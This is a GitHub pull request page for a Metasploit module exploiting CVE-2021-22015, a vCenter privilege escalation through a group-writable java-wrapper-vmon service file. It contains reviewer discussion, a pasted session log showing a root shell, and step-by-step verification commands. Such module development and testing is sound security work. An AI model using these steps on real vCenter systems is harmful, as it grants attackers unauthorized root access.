-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CVE-2021-22015 vCenter priv esc #17286
Conversation
@U1traVio1et since you uploaded the code on https://github.com/PenteraIO/vScalation-CVE-2021-22015 wanted to make sure the vuln discoverer was properly credited. |
love this, thanks! |
'Yuval Lazar' # original PoC, analysis | ||
], | ||
'Platform' => [ 'linux' ], | ||
'Arch' => [ ARCH_X86, ARCH_X64 ], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
VCenter has an x86 version?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
no idea, but x86 payloads do run on the appliance:
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
whoami
root
uname -a
Linux localhost.domain4.4.8 #1-photon SMP Fri Oct 21 20:13:51 UTC 2016 x86_64 GNU/Linux
vpxd -v
Traceback (most recent call last):
File "/usr/sbin/cloudvm-ram-size", line 52, in <module>
sys.path.append(os.environ['VMWARE_PYTHON_PATH'])
File "/usr/lib/python2.7/UserDict.py", line 40, in __getitem__
raise KeyError(key)
KeyError: 'VMWARE_PYTHON_PATH'
VMware VirtualCenter 6.5.0 build-7070488
^Z
Background session 1? [y/N] y
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/linux 1.1.1.1:4444 -> 2.2.2.2:57524 (2.2.2.2)
|
Is the cleanup working correctly? |
Because it is no longer after 5 on a Friday, it appears to work fine?
|
Yeah; I cannot seem to re-create what was happening Friday. Today, I can even restart the service when Friday, I had to reboot. The original problem was that the service restart failed and I tried to reboot to kick off the privileged session, so the file would not have been returned to the original state, yet. |
I'll also note that its set to |
Release NotesThis PR adds a priv esc for users in the cis group to escalate to root on certain versions of vCenter. A service file /usr/lib/vmware-vmon/java-wrapper-vmon has improper permissions allowing cis group members to write to it. Upon host reboot or vmware-vmon service restart, a root shell is obtained. |
Fixes #16489
This PR adds a priv esc for users in the
cis
group to escalate toroot
on certain versions of vCenter. A service file/usr/lib/vmware-vmon/java-wrapper-vmon
has improper permissions allowingcis
group members to write to it. Upon host reboot orvmware-vmon
service restart, a root shell is obtained.Verification
cis
group. (I usedsu vsphere-client
off an SSH session)use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc
set session #
run
systemctl restart vmware-vmon.service
) with a user who has permission